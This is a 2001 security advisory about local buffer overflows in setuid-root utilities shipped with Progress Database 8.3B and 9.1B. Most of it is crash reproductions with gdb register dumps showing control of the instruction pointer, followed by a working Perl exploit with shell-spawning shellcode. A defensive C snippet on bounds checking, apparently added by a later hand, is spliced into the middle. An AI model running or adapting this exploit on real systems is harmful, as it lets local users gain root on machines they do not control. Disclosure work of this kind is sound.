[UNIX] Progress Database Local Buffer Overflow

From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] Progress Database Local Buffer Overflow
Message-Id: <20011113180935.42366138BF@mail.der-keiler.de>
Date: Tue, 13 Nov 2001 19:09:35 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Progress Database Local Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Several security vulnerabilities in applications that are shipped with the
Progress Database enable local attackers to launch a buffer overflow
attack and execute arbitrary code.

DETAILS

Vulnerable systems:
Progress version 9.1B

Immune systems:
Progress version 9.1C

Example:
# gdb /usr/dlc/bin/_mpros core
Core was generated by `/usr/dlc/bin/_mprosrva AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb) q
[root@localhost /root]# /usr/dlc/bin/_mprosrva `perl -e 'print "A" x 5746'`BBBB
BBBB == 0x42424242, which is the value now in EIP.

A buffer of 1143 characters begins to overwrite EAX; 5746 characters overwrite EIP.

(gdb) info registers
eax 0x80b3c80 134954112
ecx 0xbffff4f4 -1073744652
edx 0x480b5e31 1208704561
ebx 0x1 1
esp 0xbfffdbc0 0xbfffdbc0
ebp 0xbfffdbe0 0xbfffdbe0
esi 0x2 2
edi 0xbfffdcf4 -1073750796
eip 0x42424242 0x42424242
eflags 0x10206 66054
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0

Below are several more examples.

# uname -a
SCO_SV scosysv 3.2 5.0.5 i386
# ls -al /usr/dlc/bin/preserve
-rwxr-xr-x 1 root sys 2708 Jan 9 15:29 /usr/dlc/bin/proserve
# /usr/dlc/bin/proserve `perl -e 'print "A" x 3000'`
PROGRESS Version 9.1B as of Sun Dec 3 20:27:14 EST 2000
Memory fault - core dumped
#

------------------

 /usr/dlc/bin/_mprshut `perl -e 'print "A" x 2000'`
Memory fault - core dumped

-----------------------------------

 /usr/dlc/bin/_mprosrv `perl -e 'print "A" x 2000'`
Memory fault - core dumped

-------------------

 /usr/dlc/bin/_probuild a `perl -e 'print "A" x 2000'`
Memory fault - core dumped

--------------------

 /usr/dlc/bin/prodb a `perl -e 'print "A" x 2000'`
Memory fault - core dumped

Everything below this line is version 8.3b.

-rwsrwxr-x 1 root root 508151 Nov 10 1999 /usr/dlc/bin/_dbutil*
-rwsrwxr-x 1 root root 557075 Nov 10 1999 /usr/dlc/bin/_mprosrv*
-rwsrwxr-x 1 root root 561294 Nov 10 1999 /usr/dlc/bin/_mprosrva*
-rwsrwxr-x 1 root root 604635 Nov 10 1999 /usr/dlc/bin/_mprshut*
-rwsrwxr-x 1 root root 2574331 Nov 10 1999 /usr/dlc/bin/_probuild*
-rwsrwxr-x 1 root root 2986163 Nov 10 1999 /usr/dlc/bin/_progres*
-rwsrwxr-x 1 root root 2924760 Nov 10 1999 /usr/dlc/bin/_progresa*
-rwsrwxr-x 1 root root 971209 Nov 10 1999 /usr/dlc/bin/_proutil*
-rwsrwxr-x 1 root root 686582 Nov 10 1999 /usr/dlc/bin/_rfutil*
-rwsrwxr-x 1 root root 122260 Nov 10 1999 /usr/dlc/bin/prodb*
-rwsrwxr-x 1 root root 134337 Nov 10 1999 /usr/dlc/bin/prolib*

[root@localhost /root]# /usr/dlc/bin/prolib library-name `perl -e 'print "A" x 2000'`
Invalid prolib command
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAA

Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/prolib core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/prolib library-name AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x41414141 in ?? ()

---------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_probuild sports `perl -e 'print "A" x 1200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_probuild core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_probuild sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x400905c7 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
(gdb)

---------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_progres sports `perl -e 'print "A" x 1200'`
Segmentation fault (core dumped)

[root@localhost /root]# gdb /usr/dlc/bin/_progres core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_progres sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x400905c7 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
(gdb)

------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_progresa sports `perl -e 'print "A" x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_progresa core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_progresa sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585

--------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_dbutil prorest sports `perl -e 'print "A" x 4200'`
** Cannot find or open file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
)#w:)#w:AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA

SYSTEM ERROR: Memory violation. (49)
** Save file named core for analysis by Progress Software Corporation. (439)
Quit (core dumped)

[root@localhost /root]# gdb /usr/dlc/bin/_dbutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_dbutil prorest sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA'.
Program terminated with signal 3, Quit.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x400590d1 in kill () from /lib/libc.so.6
(gdb) info register edi
edi 0x41414141 1094795585

-----------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_proutil sports `perl -e 'print "A" x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_proutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_proutil sports AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()

(gdb) info register eax
eax 0x41414141 1094795585

-------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_rfutil sports `perl -e 'print "A" x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_rfutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_rfutil sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x400905ad in ?? ()

(gdb) info register eax
eax 0x41414141 1094795585

--------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/prodb sports `perl -e 'print "A" x 4200'`

The database name is too long.
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/prodb core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `AAAAAAAAAAAAAAA AAAAAAAAAAAAA/.db.bi.tl.lg.lk AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()

(gdb) info register eip
eip 0x41414141 0x41414141
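The prodb run above is the instructive one: the utility prints "The database name is too long." and still dies with EIP set to 0x41414141, which is consistent with a length check that runs only after the over-long argument has already been copied into a fixed-size buffer (or that guards a different copy than the one that overflows). The fix is an ordering one: validate the length against the destination's capacity before any byte is written, and leave the destination untouched on rejection. The C below is an added example written for this page, not Progress code and not a patch for the real utility; the buffer size `DB_NAME_MAX`, the function names and the return codes are assumptions, and the error text is borrowed from the page only to show where such a message belongs.

```c
/* Added example (not Progress code): reject an over-long argument before
 * it is copied into a fixed-size buffer. Names, sizes and return codes
 * are assumptions made for this illustration. */
#include <stdio.h>
#include <string.h>

#define DB_NAME_MAX 255   /* assumed capacity; not the real prodb limit */

enum { DBNAME_OK = 0, DBNAME_TOO_LONG = -1, DBNAME_NULL = -2 };

/* Copy name into dst (capacity cap bytes, terminator included) only after
 * its length has been checked. On rejection dst is not modified, so the
 * "too long" diagnostic can never be printed over already-clobbered memory.
 * memchr bounds the scan of name itself, so an unterminated source cannot
 * be read past cap bytes either. */
int db_name_set(char *dst, size_t cap, const char *name)
{
    if (dst == NULL || name == NULL || cap == 0)
        return DBNAME_NULL;
    const char *end = memchr(name, '\0', cap);
    if (end == NULL)              /* no terminator within cap: cannot fit */
        return DBNAME_TOO_LONG;
    size_t n = (size_t)(end - name);
    memcpy(dst, name, n);
    dst[n] = '\0';
    return DBNAME_OK;
}

/* The fixed-size buffer a utility like prodb would own for its argument. */
struct db_args { char name[DB_NAME_MAX + 1]; };

/* Validate-then-copy: the diagnostic is emitted only when nothing was
 * written, which is the ordering the crash above lacks. */
int db_args_parse(struct db_args *a, const char *argv1)
{
    int rc = db_name_set(a->name, sizeof a->name, argv1);
    if (rc == DBNAME_TOO_LONG)
        fprintf(stderr, "The database name is too long.\n");
    return rc;
}

int main(int argc, char **argv)
{
    struct db_args a;
    if (argc < 2) {
        fprintf(stderr, "usage: %s dbname\n", argv[0]);
        return 2;
    }
    if (db_args_parse(&a, argv[1]) != DBNAME_OK)
        return 1;
    printf("database name accepted: %s\n", a.name);
    return 0;
}
```

Run with `./a.out sports` to see the accepted path and with a 4200-character argument to see the rejection; in the second case the program exits cleanly instead of dumping core, because the check happened before the copy rather than after it.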

-----------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_mprosrv sports `perl -e 'print "A" x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrv core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprosrv sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_mprosrva sports `perl -e 'print "A" x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrva core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprosrva sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585

---------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_mprshut sports `perl -e 'print "A" x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprshut core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprshut sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
(gdb)

Exploit:
#!/usr/bin/perl
# Progress 8 and 9 test exploit code
# Proof of concept by krfinisterre@checkfree.com

$len = 481; # Sufficient to overwrite the return value.
$nop = "\x90";
$ret = 0xbfffe208; # Return Value / ESP / Stack Pointer.

$shellcode=
"\x89\xe6".
"\x83\xc6\x30".
"\xb8\x2e\x62\x69\x6e".
"\x40".
"\x89\x06".
"\xb8\x2e\x73\x68\x21".
"\x40".
"\x89\x46\x04".
"\x29\xc0".
"\x88\x46\x07".
"\x89\x76\x08".
"\x89\x46\x0c".
"\xb0\x0b".
"\x87\xf3".
"\x8d\x4b\x08".
"\x8d\x53\x0c".
"\xcd\x80";

if (@ARGV < 1) {
    print("Usage: $0 <offset>\n");
    exit(1);
}

( $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

$address = sprintf('%lx', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

$exploit_string = "a $buffer";

system("echo -e \"$exploit_string\"");

ADDITIONAL INFORMATION

The information has been provided by krfinisterre <krfinisterre@checkfree.com>.
